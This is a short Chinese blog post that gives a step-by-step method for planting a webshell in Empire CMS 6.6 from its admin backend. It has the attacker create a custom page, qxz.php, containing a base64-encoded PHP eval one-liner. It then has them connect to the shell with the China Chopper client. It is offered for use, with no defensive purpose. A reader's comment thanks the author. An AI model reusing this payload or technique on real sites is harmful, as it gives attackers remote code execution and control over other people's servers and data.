帝国cms 6.6后台拿webshell方法

博主推荐【腾讯云】爆款2核2G云服务器首年40元

进入后台后点击自定义页面-增加自定义页面-随便写了qxz.php文件名,页面内容填写,<script language=”php”>echo base64_decode(“PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSk7Pz4=”);</script>

如果内容直接添一句话或者php大马是没有用的,,因为他会生成qxz.php前先给你执行!!
PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSk7Pz4=  就是 <?php @eval($_POST[‘cmd’]);?> 的base64加密。
所以生成qxz.php后 会出现内容 <?php @eval($_POST[‘cmd’]);?> 在文件里,然后用菜刀直接连接就会看到你想要的结果了哈哈!

原创文章转载请注明:转载自 七行者博客

本文固定链接: https://www.qxzxp.com/3290.html

帝国cms 6.6后台拿webshell方法:目前有1 条留言

  1. 0楼
    李雪儿:

    谢谢博主,真是太好了

    2015-12-31 05:03 [回复]

发表评论

3 + 9 =

快捷键:Ctrl+Enter